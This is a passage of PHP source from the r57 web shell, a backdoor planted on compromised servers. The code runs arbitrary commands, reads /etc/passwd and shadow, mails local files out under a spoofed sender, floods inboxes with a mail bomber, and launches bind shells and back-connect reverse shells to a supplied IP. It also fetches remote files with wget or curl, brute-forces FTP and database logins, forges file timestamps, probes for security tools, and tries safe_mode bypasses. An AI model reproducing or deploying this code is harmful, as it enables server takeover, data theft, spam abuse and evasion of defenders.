" . ws(2); echo "Safe_mode: "; echo (($safe_mode) ? ("ON") : ("Kapali")); echo "" . ws(2); echo "Open_basedir: "; if ($open_basedir) { if ('' == ($df = @ini_get('open_basedir'))) { echo "ini_get disable!"; } else { echo "$df"; }; } else { echo "NONE"; } echo ws(2) . "Safe_mode_exec_dir: "; if (@function_exists('ini_get')) { if ('' == ($df = @ini_get('safe_mode_exec_dir'))) { echo "NONE"; } else { echo "$df"; }; } else { echo "ini_get disable!"; } echo ws(2) . "Safe_mode_include_dir: "; if (@function_exists('ini_get')) { if ('' == ($df = @ini_get('safe_mode_include_dir'))) { echo "NONE"; } else { echo "$df"; }; } else { echo "ini_get disable!"; } echo "
" . ws(2); echo "Disable functions : "; $df = 'ini_get disable!'; if ((@function_exists('ini_get')) && ('' == ($df = @ini_get('disable_functions')))) { echo "NONE"; } else { echo "$df"; } $free = @diskfreespace($dir); if (!$free) { $free = 0; } $all = @disk_total_space($dir); if (!$all) { $all = 0; } echo "
" . ws(2) . "Free space : " . view_size($free) . " Total space: " . view_size($all) . ""; $ust = ''; if ($unix && !$safe_mode) { if (which('gcc')) { $ust.= "gcc,"; } if (which('cc')) { $ust.= "cc,"; } if (which('ld')) { $ust.= "ld,"; } if (which('php')) { $ust.= "php,"; } if (which('perl')) { $ust.= "perl,"; } if (which('python')) { $ust.= "python,"; } if (which('ruby')) { $ust.= "ruby,"; } if (which('make')) { $ust.= "make,"; } if (which('tar')) { $ust.= "tar,"; } if (which('nc')) { $ust.= "netcat,"; } if (which('locate')) { $ust.= "locate,"; } if (which('suidperl')) { $ust.= "suidperl,"; } } if (@function_exists('pcntl_exec')) { $ust.= "pcntl_exec,"; } if ($ust) { echo "
" . ws(2) . $lang[$language . '_text137'] . ": " . $ust . ""; } $ust = ''; if ($unix && !$safe_mode) { if (which('kav')) { $ust.= "kav,"; } if (which('nod32')) { $ust.= "nod32,"; } if (which('bdcored')) { $ust.= "bitdefender,"; } if (which('uvscan')) { $ust.= "mcafee,"; } if (which('sav')) { $ust.= "symantec,"; } if (which('drwebd')) { $ust = "drwebd,"; } if (which('clamd')) { $ust.= "clamd,"; } if (which('rkhunter')) { $ust.= "rkhunter,"; } if (which('chkrootkit')) { $ust.= "chkrootkit,"; } if (which('iptables')) { $ust.= "iptables,"; } if (which('ipfw')) { $ust.= "ipfw,"; } if (which('tripwire')) { $ust.= "tripwire,"; } if (which('shieldcc')) { $ust.= "stackshield,"; } if (which('portsentry')) { $ust.= "portsentry,"; } if (which('snort')) { $ust.= "snort,"; } if (which('ossec')) { $ust.= "ossec,"; } if (which('lidsadm')) { $ust.= "lidsadm,"; } if (which('tcplodg')) { $ust.= "tcplodg,"; } if (which('tripwire')) { $ust.= "tripwire,"; } if (which('sxid')) { $ust.= "sxid,"; } if (which('logcheck')) { $ust.= "logcheck,"; } if (which('logwatch')) { $ust.= "logwatch,"; } } if (@function_exists('apache_get_modules') && @in_array('mod_security', apache_get_modules())) { $ust.= "mod_security,"; } if ($ust) { echo "
" . ws(2) . $lang[$language . '_text138'] . ": $ust"; } echo "
" . ws(2) . ""; echo ws(2) . $lb . " phpinfo " . $rb; echo ws(2) . $lb . " php.ini " . $rb; echo ws(2) . $lb . " cpu " . $rb; echo ws(2) . $lb . " mem " . $rb; if (!$unix) { echo ws(2) . $lb . " systeminfo " . $rb; } else { echo ws(2) . $lb . " syslog " . $rb; echo ws(2) . $lb . " resolv " . $rb; echo ws(2) . $lb . " hosts " . $rb; echo ws(2) . $lb . " shadow " . $rb; echo ws(2) . $lb . " passwd " . $rb; } echo ws(2) . $lb . " tmp " . $rb; echo ws(2) . $lb . " delete " . $rb; if ($unix && !$safe_mode) { echo "
" . ws(2) . ""; echo ws(2) . $lb . " procinfo " . $rb; echo ws(2) . $lb . " version " . $rb; echo ws(2) . $lb . " free " . $rb; echo ws(2) . $lb . " dmesg " . $rb; echo ws(2) . $lb . " vmstat " . $rb; echo ws(2) . $lb . " lspci " . $rb; echo ws(2) . $lb . " lsdev " . $rb; echo ws(2) . $lb . " interrupts " . $rb; echo ws(2) . $lb . " realise1 " . $rb; echo ws(2) . $lb . " realise2 " . $rb; echo ws(2) . $lb . " lsattr " . $rb; echo "
" . ws(2) . ""; echo ws(2) . $lb . " w " . $rb; echo ws(2) . $lb . " who " . $rb; echo ws(2) . $lb . " uptime " . $rb; echo ws(2) . $lb . " last " . $rb; echo ws(2) . $lb . " ps aux " . $rb; echo ws(2) . $lb . " service " . $rb; echo ws(2) . $lb . " ifconfig " . $rb; echo ws(2) . $lb . " netstat " . $rb; echo ws(2) . $lb . " fstab " . $rb; echo ws(2) . $lb . " fdisk " . $rb; echo ws(2) . $lb . " df -h " . $rb; } echo '
'; echo $font; if ($unix) { echo 'uname -a :' . ws(1) . '
sysctl :' . ws(1) . '
$OSTYPE :' . ws(1) . '
Server :' . ws(1) . '
id :' . ws(1) . '
pwd :' . ws(1) . '

'; echo "
"; echo ""; echo ((!empty($uname)) ? (ws(3) . @substr($uname, 0, 120) . "
") : (ws(3) . @substr(@php_uname(), 0, 120) . "
")); echo ws(3) . $sysctl . "
"; echo ws(3) . ex('echo $OSTYPE') . "
"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "
"; if (!empty($id)) { echo ws(3) . $id . "
"; } else if (@function_exists('posix_geteuid') && @function_exists('posix_getegid') && @function_exists('posix_getgrgid') && @function_exists('posix_getpwuid')) { $euserinfo = @posix_getpwuid(@posix_geteuid()); $egroupinfo = @posix_getgrgid(@posix_getegid()); echo ws(3) . 'uid=' . $euserinfo['uid'] . ' ( ' . $euserinfo['name'] . ' ) gid=' . $egroupinfo['gid'] . ' ( ' . $egroupinfo['name'] . ' )
'; } else echo ws(3) . "user=" . @get_current_user() . " uid=" . @getmyuid() . " gid=" . @getmygid() . "
"; echo ws(3) . $dir; echo ws(3) . '( ' . perms(@fileperms($dir)) . ' )'; echo "
"; } else { echo 'OS :' . ws(1) . '
Server :' . ws(1) . '
User :' . ws(1) . '
pwd :' . ws(1) . '

'; echo "
"; echo ""; echo ws(3) . @substr(@php_uname(), 0, 120) . "
"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "
"; echo ws(3) . @getenv("USERNAME") . "
"; echo ws(3) . $dir; echo "
"; } echo ""; echo "
"; if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail") { $res = mail($_POST['to'], $_POST['subj'], $_POST['text'], "From: " . $_POST['from'] . "\r\n"); err(6 + $res); $_POST['cmd'] = ""; } if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_file" && !empty($_POST['loc_file'])) { if ($file = @fopen($_POST['loc_file'], "r")) { $filedump = @fread($file, @filesize($_POST['loc_file'])); @fclose($file); } else if ($file = readzlib($_POST['loc_file'])) { $filedump = $file; } else { err(1, $_POST['loc_file']); $_POST['cmd'] = ""; } if (isset($_POST['cmd'])) { $filename = @basename($_POST['loc_file']); $content_encoding = $mime_type = ''; compress($filename, $filedump, $_POST['compress']); $attach = array("name" => $filename, "type" => $mime_type, "content" => $filedump); if (empty($_POST['subj'])) { $_POST['subj'] = 'file from r57'; } if (empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; } $res = mailattach($_POST['to'], $_POST['from'], $_POST['subj'], $attach); err(6 + $res); $_POST['cmd'] = ""; } } if (!empty($_POST['cmd']) && $_POST['cmd'] == "mail_bomber" && !empty($_POST['mail_flood']) && !empty($_POST['mail_size'])) { for ($h = 1; $h <= $_POST['mail_flood']; $h++) { $res = mail($_POST['to'], $_POST['subj'], $_POST['text'] . str_repeat(" ", 1024 * $_POST['mail_size']), "From: " . $_POST['from'] . "\r\n"); } err(6 + $res); $_POST['cmd'] = ""; } if (!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") { $_POST['cmd'] = 'find ' . $_POST['s_dir'] . ' -name \'' . $_POST['s_mask'] . '\' | xargs grep -E \'' . $_POST['s_text'] . '\''; } if (!empty($_POST['cmd']) && $_POST['cmd'] == "ch_") { switch ($_POST['what']) { case 'own': @chown($_POST['param1'], $_POST['param2']); break; case 'grp': @chgrp($_POST['param1'], $_POST['param2']); break; case 'mod': @chmod($_POST['param1'], intval($_POST['param2'], 8)); break; } $_POST['cmd'] = ""; } if (!empty($_POST['cmd']) && $_POST['cmd'] == "mk") { switch ($_POST['what']) { case 'file': if ($_POST['action'] == "create") { if (@file_exists($_POST['mk_name']) || !$file = @fopen($_POST['mk_name'], "w")) { err(2, $_POST['mk_name']); $_POST['cmd'] = ""; } else { @fclose($file); $_POST['e_name'] = $_POST['mk_name']; $_POST['cmd'] = "edit_file"; echo "
" . $lang[$language . '_text61'] . "
"; } } else if ($_POST['action'] == "delete") { if (unlink($_POST['mk_name'])) echo "
" . $lang[$language . '_text63'] . "
"; $_POST['cmd'] = ""; } break; case 'dir': if ($_POST['action'] == "create") { if (@mkdir($_POST['mk_name'])) { $_POST['cmd'] = ""; echo "
" . $lang[$language . '_text62'] . "
"; } else { err(2, $_POST['mk_name']); $_POST['cmd'] = ""; } } else if ($_POST['action'] == "delete") { if (@rmdir($_POST['mk_name'])) echo "
" . $lang[$language . '_text64'] . "
"; $_POST['cmd'] = ""; } break; } } if (!empty($_POST['cmd']) && $_POST['cmd'] == "touch") { if (!$_POST['file_name_r']) { $datar = $_POST['day'] . " " . $_POST['month'] . " " . $_POST['year'] . " " . $_POST['chasi'] . " hours " . $_POST['minutes'] . " minutes " . $_POST['second'] . " seconds"; $datar = @strtotime($datar); @touch($_POST['file_name'], $datar, $datar); } else { @touch($_POST['file_name'], @filemtime($_POST['file_name_r']), @filemtime($_POST['file_name_r'])); } $_POST['cmd'] = ""; } if (!empty($_POST['cmd']) && $_POST['cmd'] == "edit_file" && !empty($_POST['e_name'])) { if (!$file = @fopen($_POST['e_name'], "r+")) { $filedump = @fread($file, @filesize($_POST['e_name'])); @fclose($file); $only_read = 1; } if ($file = @fopen($_POST['e_name'], "r")) { $filedump = @fread($file, @filesize($_POST['e_name'])); @fclose($file); } else if ($file = readzlib($_POST['e_name'])) { $filedump = $file; $only_read = 1; } else { err(1, $_POST['e_name']); $_POST['cmd'] = ""; } if (isset($_POST['cmd'])) { echo $table_up3; echo $font; echo "
"; echo ws(3) . "" . $_POST['e_name'] . ""; echo "
"; echo ""; echo ""; echo ""; echo (!empty($only_read) ? ("

" . $lang[$language . '_text44']) : ("

")); echo "
"; echo "
"; echo "
"; echo ""; exit(); } } if (!empty($_POST['cmd']) && $_POST['cmd'] == "save_file") { $mtime = @filemtime($_POST['e_name']); if ((!$file = @fopen($_POST['e_name'], "w")) && (!function_exists('file_put_contents'))) { err(0, $_POST['e_name']); } else { if ($unix) $_POST['e_text'] = @str_replace("\r\n", "\n", $_POST['e_text']); @fwrite($file, $_POST['e_text']) or @fputs($file, $_POST['e_text']) or @file_put_contents($_POST['e_name'], $_POST['e_text']); @touch($_POST['e_name'], $mtime, $mtime); $_POST['cmd'] = ""; echo "
" . $lang[$language . '_text45'] . "
"; } } if (!empty($_POST['proxy_port']) && ($_POST['use'] == "Perl")) { cf("/tmp/prxpl", $prx_pl); $p2 = which("perl"); $blah = ex($p2 . " /tmp/prxpl " . $_POST['proxy_port'] . " &"); $_POST['cmd'] = "ps -aux | grep prxpl"; } if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "C")) { cf("/tmp/bd.c", $port_bind_bd_c); $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); @unlink("/tmp/bd.c"); $blah = ex("/tmp/bd " . $_POST['port'] . " " . $_POST['bind_pass'] . " &"); $_POST['cmd'] = "ps -aux | grep bd"; } if (!empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == "Perl")) { cf("/tmp/bdpl", $port_bind_bd_pl); $p2 = which("perl"); $blah = ex($p2 . " /tmp/bdpl " . $_POST['port'] . " &"); $_POST['cmd'] = "ps -aux | grep bdpl"; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "Perl")) { cf("/tmp/back", $back_connect); $p2 = which("perl"); $blah = ex($p2 . " /tmp/back " . $_POST['ip'] . " " . $_POST['port'] . " &"); $_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\""; } if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use'] == "C")) { cf("/tmp/back.c", $back_connect_c); $blah = ex("gcc -o /tmp/backc /tmp/back.c"); @unlink("/tmp/back.c"); $blah = ex("/tmp/backc " . $_POST['ip'] . " " . $_POST['port'] . " &"); $_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\""; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "Perl")) { cf("/tmp/dp", $datapipe_pl); $p2 = which("perl"); $blah = ex($p2 . " /tmp/dp " . $_POST['local_port'] . " " . $_POST['remote_host'] . " " . $_POST['remote_port'] . " &"); $_POST['cmd'] = "ps -aux | grep dp"; } if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use'] == "C")) { cf("/tmp/dpc.c", $datapipe_c); $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); @unlink("/tmp/dpc.c"); $blah = ex("/tmp/dpc " . $_POST['local_port'] . " " . $_POST['remote_port'] . " " . $_POST['remote_host'] . " &"); $_POST['cmd'] = "ps -aux | grep dpc"; } if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; } for ($upl = 0; $upl <= 16; $upl++) { if (!empty($HTTP_POST_FILES['userfile' . $upl]['name'])) { if (!empty($_POST['new_name']) && ($upl == 0)) { $nfn = $_POST['new_name']; } else { $nfn = $HTTP_POST_FILES['userfile' . $upl]['name']; } @move_uploaded_file($HTTP_POST_FILES['userfile' . $upl]['tmp_name'], $_POST['dir'] . "/" . $nfn) or print ("
Error uploading file " . $HTTP_POST_FILES['userfile' . $upl]['name'] . "
"); } } if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) { switch ($_POST['with']) { case 'fopen': $datafile = @implode("", @file($_POST['rem_file'])); if ($datafile) { $w_file = @fopen($_POST['loc_file'], "wb") or @function_exists('file_put_contents') or err(0); if ($w_file) { @fwrite($w_file, $datafile) or @fputs($w_file, $datafile) or @file_put_contents($_POST['loc_file'], $datafile); @fclose($w_file); } } $_POST['cmd'] = ''; break; case 'wget': $_POST['cmd'] = which('wget') . " " . $_POST['rem_file'] . " -O " . $_POST['loc_file'] . ""; break; case 'fetch': $_POST['cmd'] = which('fetch') . " -o " . $_POST['loc_file'] . " -p " . $_POST['rem_file'] . ""; break; case 'lynx': $_POST['cmd'] = which('lynx') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case 'links': $_POST['cmd'] = which('links') . " -source " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case 'GET': $_POST['cmd'] = which('GET') . " " . $_POST['rem_file'] . " > " . $_POST['loc_file'] . ""; break; case 'curl': $_POST['cmd'] = which('curl') . " " . $_POST['rem_file'] . " -o " . $_POST['loc_file'] . ""; break; } } if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_file_up") || ($_POST['cmd'] == "ftp_file_down"))) { list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']); if (empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect($ftp_server, $ftp_port, 10); if (!$connection) { err(3); } else { if (!@ftp_login($connection, $_POST['ftp_login'], $_POST['ftp_password'])) { err(4); } else { if ($_POST['cmd'] == "ftp_file_down") { if (chop($_POST['loc_file']) == $dir) { $_POST['loc_file'] = $dir . ((!$unix) ? ('\\') : ('/')) . basename($_POST['ftp_file']); } @ftp_get($connection, $_POST['loc_file'], $_POST['ftp_file'], $_POST['mode']); } if ($_POST['cmd'] == "ftp_file_up") { @ftp_put($connection, $_POST['ftp_file'], $_POST['loc_file'], $_POST['mode']); } } } @ftp_close($connection); $_POST['cmd'] = ""; } if (!empty($_POST['cmd']) && (($_POST['cmd'] == "ftp_brute") || ($_POST['cmd'] == "db_brute"))) { if ($_POST['cmd'] == "ftp_brute") { list($ftp_server, $ftp_port) = split(":", $_POST['ftp_server_port']); if (empty($ftp_port)) { $ftp_port = 21; } $connection = @ftp_connect($ftp_server, $ftp_port, 10); } else if ($_POST['cmd'] == "db_brute") { $connection = 1; } if (!$connection) { err(3); $_POST['cmd'] = ""; } else if (($_POST['brute_method'] == 'passwd') && (!$users = get_users('/etc/passwd'))) { echo "
" . $lang[$language . '_text96'] . "
"; $_POST['cmd'] = ""; } else if (($_POST['brute_method'] == 'dic') && (!$users = get_users($_POST['dictionary']))) { echo "
Can\'t get password list
"; $_POST['cmd'] = ""; } if ($_POST['cmd'] == "ftp_brute") { @ftp_close($connection); } } echo $table_up3; if (empty($_POST['cmd']) && !$safe_mode && !$open_basedir) { $_POST['cmd'] = (!$unix) ? ("dir") : ("ls -lia"); } else if (empty($_POST['cmd']) && ($safe_mode || $open_basedir)) { $_POST['cmd'] = "safe_dir"; } echo $font . $lang[$language . '_text1'] . ": " . $_POST['cmd'] . "
"; echo "
"; echo ""; echo ""; function div_title($title, $id) { return '' . $title . ''; } function div($id) { if (isset($_COOKIE[$id]) && ($_COOKIE[$id] == 0)) return '' . $table_end1 . $fe; if ($safe_mode || $open_basedir) { echo $fs . $table_up1 . div_title($lang[$language . '_text57'], 'id4') . $table_up2 . div('id4') . $ts; echo sr(15, "" . $lang[$language . '_text58'] . $arrow . "", in('text', 'mk_name', 54, (!empty($_POST['mk_name']) ? ($_POST['mk_name']) : ("new_name"))) . ws(4) . "" . ws(3) . "" . in('hidden', 'cmd', 0, 'mk') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt13'])); echo $te . '' . $table_end1 . $fe; } if ($unix && @function_exists('touch')) { echo $fs . $table_up1 . div_title($lang[$language . '_text128'], 'id5') . $table_up2 . div('id5') . $ts; echo sr(15, "" . $lang[$language . '_text43'] . $arrow . "", in('text', 'file_name', 40, (!empty($_POST['file_name']) ? ($_POST['file_name']) : ($dir . "/r57shell.php"))) . ws(4) . "" . $lang[$language . '_text26'] . ws(2) . $lang[$language . '_text59'] . $arrow . "" . ws(2) . in('text', 'file_name_r', 40, (!empty($_POST['file_name_r']) ? ($_POST['file_name_r']) : ("")))); echo sr(15, " or set Day" . $arrow . "", ' ' . ws(4) . "Month" . $arrow . "" . ' ' . ws(4) . "Year" . $arrow . "" . ' ' . ws(4) . "Hour" . $arrow . "" . ' ' . ws(4) . "Minute" . $arrow . "" . ' ' . ws(4) . "Second" . $arrow . "" . ' ' . in('hidden', 'cmd', 0, 'touch') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo $te . '' . $table_end1 . $fe; } $select = ''; if (@function_exists('chmod')) { $select.= ""; } if (@function_exists('chown')) { $select.= ""; } if (@function_exists('chgrp')) { $select.= ""; } if ($unix && $select) { echo $fs . $table_up1 . div_title($lang[$language . '_text67'], 'id6') . $table_up2 . div('id6') . $ts; echo @sr(15, "" . $lang[$language . '_text43'] . $arrow . "", in('text', 'param1', 55, (($_POST['param1']) ? ($_POST['param1']) : ($dir . "/r57shell.php"))) . ws(2) . "" . $lang[$language . '_text68'] . $arrow . "" . "" . ws(4) . in('text', 'param2 title="' . $lang[$language . '_text71'] . '"', 10, (($_POST['param2']) ? ($_POST['param2']) : ("0777"))) . in('hidden', 'cmd', 0, 'ch_') . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo $te . '' . $table_end1 . $fe; } if (!$safe_mode) { $aliases2 = ''; foreach ($aliases as $alias_name => $alias_cmd) { $aliases2.= ""; } echo $fs . $table_up1 . div_title($lang[$language . '_text7'], 'id7') . $table_up2 . div('id7') . $ts; echo sr(15, "" . ws(9) . $lang[$language . '_text8'] . $arrow . ws(4) . "", "" . in('hidden', 'dir', 0, $dir) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt1'])); echo $te . '' . $table_end1 . $fe; } echo $fs . $table_up1 . div_title($lang[$language . '_text54'], 'id8') . $table_up2 . div('id8') . $ts; echo sr(15, "" . $lang[$language . '_text52'] . $arrow . "", in('text', 's_text', 85, 'text') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt12'])); echo sr(15, "" . $lang[$language . '_text53'] . $arrow . "", in('text', 's_dir', 85, $dir) . " * ( /root; /home; /tmp )"); echo sr(15, "" . $lang[$language . '_text55'] . $arrow . "", in('checkbox', 'm id=m', 0, '1') . in('text', 's_mask', 82, '.txt; .php') . "* ( .txt; .php; .htm )" . in('hidden', 'cmd', 0, 'search_text') . in('hidden', 'dir', 0, $dir)); echo $te . '' . $table_end1 . $fe; if (!$safe_mode && $unix) { echo $fs . $table_up1 . div_title($lang[$language . '_text76'], 'id9') . $table_up2 . div('id9') . $ts; echo sr(15, "" . $lang[$language . '_text72'] . $arrow . "", in('text', 's_text', 85, 'text') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt12'])); echo sr(15, "" . $lang[$language . '_text73'] . $arrow . "", in('text', 's_dir', 85, $dir) . " * ( /root; /home; /tmp )"); echo sr(15, "" . $lang[$language . '_text74'] . $arrow . "", in('text', 's_mask', 85, '*.[hc]') . ws(1) . $lang[$language . '_text75'] . in('hidden', 'cmd', 0, 'find_text') . in('hidden', 'dir', 0, $dir)); echo $te . '' . $table_end1 . $fe; } echo $fs . $table_up1 . div_title($lang[$language . '_text32'], 'id10') . $table_up2 . $font; echo "
" . div('id10') . ""; echo in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'php_eval'); echo "
" . ws(1) . in('submit', 'submit', 0, $lang[$language . '_butt1']); echo "
"; echo $table_end1 . $fe; if ($safe_mode || $open_basedir) { echo $fs . $table_up1 . div_title($lang[$language . '_text34'], 'id11') . $table_up2 . div('id11') . $ts; echo "
"; echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test2_file', 85, (!empty($_POST['test2_file']) ? ($_POST['test2_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test2') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && $curl_on && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text33'], 'id12') . $table_up2 . div('id12') . $ts; echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test1_file', 85, (!empty($_POST['test1_file']) ? ($_POST['test1_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test1') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && $mysql_on) { echo $fs . $table_up1 . div_title($lang[$language . '_text35'], 'id13') . $table_up2 . div('id13') . $ts; echo sr(15, "" . $lang[$language . '_text36'] . $arrow . "", in('text', 'test3_md', 15, (!empty($_POST['test3_md']) ? ($_POST['test3_md']) : ("mysql"))) . ws(4) . "" . $lang[$language . '_text37'] . $arrow . "" . in('text', 'test3_ml', 15, (!empty($_POST['test3_ml']) ? ($_POST['test3_ml']) : ("root"))) . ws(4) . "" . $lang[$language . '_text38'] . $arrow . "" . in('text', 'test3_mp', 15, (!empty($_POST['test3_mp']) ? ($_POST['test3_mp']) : ("password"))) . ws(4) . "" . $lang[$language . '_text14'] . $arrow . "" . in('text', 'test3_port', 15, (!empty($_POST['test3_port']) ? ($_POST['test3_port']) : ("3306")))); echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test3_file', 96, (!empty($_POST['test3_file']) ? ($_POST['test3_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test3') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && $mssql_on) { echo $fs . $table_up1 . div_title($lang[$language . '_text85'], 'id14') . $table_up2 . div('id14') . $ts; echo sr(15, "" . $lang[$language . '_text36'] . $arrow . "", in('text', 'test4_md', 15, (!empty($_POST['test4_md']) ? ($_POST['test4_md']) : ("master"))) . ws(4) . "" . $lang[$language . '_text37'] . $arrow . "" . in('text', 'test4_ml', 15, (!empty($_POST['test4_ml']) ? ($_POST['test4_ml']) : ("sa"))) . ws(4) . "" . $lang[$language . '_text38'] . $arrow . "" . in('text', 'test4_mp', 15, (!empty($_POST['test4_mp']) ? ($_POST['test4_mp']) : ("password"))) . ws(4) . "" . $lang[$language . '_text14'] . $arrow . "" . in('text', 'test4_port', 15, (!empty($_POST['test4_port']) ? ($_POST['test4_port']) : ("1433")))); echo sr(15, "" . $lang[$language . '_text3'] . $arrow . "", in('text', 'test4_file', 96, (!empty($_POST['test4_file']) ? ($_POST['test4_file']) : ("dir"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test4') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && $unix && @function_exists('mb_send_mail') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text112'], 'id15') . $table_up2 . div('id15') . $ts; echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test5_file', 96, (!empty($_POST['test5_file']) ? ($_POST['test5_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test5') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_list') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text113'], 'id20') . $table_up2 . div('id20') . $ts; echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'test6_file', 96, (!empty($_POST['test6_file']) ? ($_POST['test6_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test6') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('imap_open') && @function_exists('imap_body') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text114'], 'id21') . $table_up2 . div('id21') . $ts; echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test7_file', 96, (!empty($_POST['test7_file']) ? ($_POST['test7_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test7') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('copy') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text115'], 'id22') . $table_up2 . div('id22') . $ts; echo sr(15, "" . $lang[$language . '_text116'] . $arrow . "", in('text', 'test8_file1', 96, (!empty($_POST['test8_file1']) ? ($_POST['test8_file1']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test8')); echo sr(15, "" . $lang[$language . '_text117'] . $arrow . "", in('text', 'test8_file2', 96, (!empty($_POST['test8_file2']) ? ($_POST['test8_file2']) : ($dir))) . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('ini_restore') && @version_compare(@phpversion(), "5.2.0") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text120'], 'id23') . $table_up2 . div('id23') . $ts; echo sr(15, "" . $lang[$language . '_text30'] . $arrow . "", in('text', 'test9_file', 96, (!empty($_POST['test9_file']) ? ($_POST['test9_file']) : ("/etc/passwd"))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test9') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.0.0") < 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text121'], 'id24') . $table_up2 . div('id24') . $ts; echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'test10_file', 96, (!empty($_POST['test10_file']) ? ($_POST['test10_file']) : ($dir))) . in('hidden', 'dir', 0, $dir) . in('hidden', 'cmd', 0, 'test10') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @function_exists('glob') && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text122'], 'id19') . $table_up2 . div('id19') . $ts; echo sr(15, "" . $lang[$language . '_text4'] . $arrow . "", in('text', 'dir', 96, (!empty($_POST['test18_file']) ? ($_POST['test18_file']) : ($dir))) . in('hidden', 'cmd', 0, 'safe_dir') . ws(4) . in('submit', 'submit', 0, $lang[$language . '_butt8'])); echo $te . '' . $table_end1 . $fe; } if (($safe_mode || $open_basedir) && @version_compare(@phpversion(), "5.2.2") <= 0) { echo $fs . $table_up1 . div_title($lang[$language . '_text130'], 'id25') . $table_up2 . div('id25') . $ts; echo sr(15, "" . $lang[$language . 